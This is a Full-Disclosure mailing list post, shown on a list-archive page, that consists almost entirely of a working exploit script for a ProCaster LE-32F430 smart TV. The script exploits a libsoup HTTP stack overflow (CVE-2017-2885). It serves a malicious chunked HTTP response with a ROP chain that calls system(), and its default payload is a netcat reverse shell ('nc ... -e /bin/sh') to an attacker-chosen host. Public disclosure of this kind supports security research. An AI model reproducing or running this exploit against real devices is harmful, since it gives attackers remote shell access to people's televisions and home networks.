lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20201204051544.GA14000@huumeet.info>
Date: Fri, 4 Dec 2020 07:15:44 +0200
From: def <def@...meet.info>
To: fulldisclosure@...lists.org
Subject: [FD] ProCaster LE-32F430 SmartTV RCE via libsoup/2.51.3 stack
 overflow (CVE-2017-2885)

#!/bin/sh
# ProCaster LE-32F430 (NotSo)SmartTV remote code execution exploit through
# GStreamer souphttpsrc libsoup/2.51.3 HTTP stack overflow (CVE-2017-2885)
# ~ def <def@...meet.info> 2020-02-15 ................. 850day exploit lol

# Exploit payload: ret2libc system() nc reverse shell with a clean exit()
CMD="${CMD:-/bin/busybox nc ${IP:-192.168.1.100} ${PORT:-54321} -e /bin/sh}"

case "${1:-${ACTION:-httpd}}" in # By default, start socat-based exploit server
    httpd)
        # Check dependencies
        for PROGRAM in socat python3 dd wc; do
            if ! command -v "$PROGRAM" >/dev/null; then
                printf "Missing dependency: %s\n" "$PROGRAM"
                exit 1
            fi
        done

        # Parse bind address and port
        case "${ARG=${2:-${HTTPD_BIND:-0.0.0.0:12345}}}" in
            *:*) HTTPD_ADDR="${ARG%:*}"; HTTPD_PORT="${ARG#*:}" ;;
            *) printf "Bad httpd [IPv4:PORT] bind arg: %s\n" "$ARG"; exit 1 ;;
        esac >&2

        # Start socat HTTP server
        printf "HTTP souploit.sh server @ %s:%d\n" "$HTTPD_ADDR" "$HTTPD_PORT"
        printf "Exploit system() payload: %s\n" "$CMD"
        exec socat -v -x \
            TCP-LISTEN:"$HTTPD_PORT,reuseaddr,fork,bind=$HTTPD_ADDR" \
            EXEC:"\\'$0\\' request"
        ;;

    -h|--help|help) printf "Usage: %s httpd [IPv4:PORT]\n" "$0"; exit 0 ;;

    request) set -e ;;

    *) printf "Unsupported %s action: '%s'\n" "$0" "$1" >&2; exit 1 ;;
esac

# GStreamer souphttpsrc dislikes fragmented HTTP responses (so buffer them)
flush_stdout() {
    exec 1>&3 3>&-
    dd if=/tmp/$$.stdout bs="$(wc -c </tmp/$$.stdout)" count=1 2>/dev/null
    rm -f /tmp/$$.stdout
}
exec 3>&1 1>/tmp/$$.stdout
trap flush_stdout EXIT

# Parse HTTP request
IFS="$(printf '\t\r\n ')"
TIME="$(date '+%Y-%m-%d %H:%M:%S%z')"
if read -r METHOD URL HTTP && [ -n "$METHOD" -a -n "$URL" -a -n "$HTTP" ]; then
    printf "[%s] %s %s %s\n" "$TIME" "$METHOD" "$URL" "$HTTP" >&2
    while IFS="$IFS:" read -r KEY VALUE && [ -n "$KEY" -a -n "$VALUE" ]
    do printf "[%s] %s: %s\n" "$TIME" "$KEY" "$VALUE"; done >&2
else
    printf "[%s] '%s' '%s' '%s'\n" "$TIME" "$METHOD" "$URL" "$HTTP" >&2
    printf "HTTP/1.1 400 Bad Request\r\n"
    printf "Date: %s\r\n" "$(TZ=GMT date '+%a, %d %b %Y %T %Z')"
    printf "Content-Length: 0\r\n"
    printf "Connection: close\r\n"
    printf "\r\n"
    exit 0
fi

# Handle HTTP HEAD and GET
if [ "$METHOD" = "HEAD" ]; then
    printf "HTTP/1.1 200 OK\r\n"
    printf "Date: %s\r\n" "$(TZ=GMT date '+%a, %d %b %Y %T %Z')"
    printf "Content-Type: %s\r\n" "${MIME:-"video/mp4"}"
    printf "Content-Length: %d\r\n" "12345"
    printf "Accept-Ranges: bytes\r\n"
    printf "Connection: close\r\n"
    printf "\r\n"
    exit 0
elif [ "$METHOD" != "GET" ]; then
    printf "HTTP/1.1 405 Not Allowed\r\n"
    printf "Date: %s\r\n" "$(TZ=GMT date '+%a, %d %b %Y %T %Z')"
    printf "Content-Length: 0\r\n"
    printf "Connection: close\r\n"
    printf "\r\n"
    exit 0
fi

# Exploit payload
python3 -u - "$CMD" <<"EOF"
import sys, struct
command = sys.argv[1].encode() + b'\x00'
if len(command) > 108: raise Exception("Command length exceeds limit 108")
LE32, BE32 = lambda v: struct.pack('<I', v), lambda v: struct.pack('>I', v)
sys.stdout.buffer.write(b"".join([
#####################################
b"HTTP/1.1 206 OK\r\n",             #
b"Transfer-Encoding: chunked\r\n",  #
b"Connection: close\r\n",           #
b"\r\n",                            #
#####################################
b"1\r\n",           # start a chunk #
b">",               # 4B alignment  #
#####################################
LE32(0xAAAAAAAA),   # padding       #
LE32(0xBBBBBBBB),   # padding       #
LE32(0xCCCCCCCC),   # padding       #
#####################################
LE32(0x477B9C49),   # (9) sym.exit
command.ljust(108), # system() command
LE32(0x4783A1E3),   # (4) pc = add sp, 0x64; pop.w {r4, ..., r11, pc}
LE32(0x4784A7C7),   # (7) r4 = ldr lr, [sp], 4; bx r3; bx lr
LE32(0x4783D287),   # (2) r4 = mov r0, sp; blx r3
#####################################
BE32(0x01234567),   # padding       #
BE32(0x89ABCDEF),   # padding       #
#####################################
LE32(0x477C01E5),   # (8) r8 = sym.system
LE32(0x477CF019),   # (3) r8 = add sp, 0x6C; ldr pc, [sp], 4
LE32(0x478436F7),   # (6) r10 = mov r3, r8; blx r4
LE32(0x478436F7),   # (1) r10 = mov r3, r8; blx r4
LE32(0x477927A3),   # (5) pc = sub sp, 0x98; bx r10
LE32(0x477927A3),   # (0) pc = sub sp, 0x98; bx r10
#####################################
LE32(0x4787BB08),   # valid pointer #
LE32(0x4787BB08),   # valid pointer #
#####################################
b"\r\n"             # payload EOF   # 248B
#####################################
]))
EOF

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ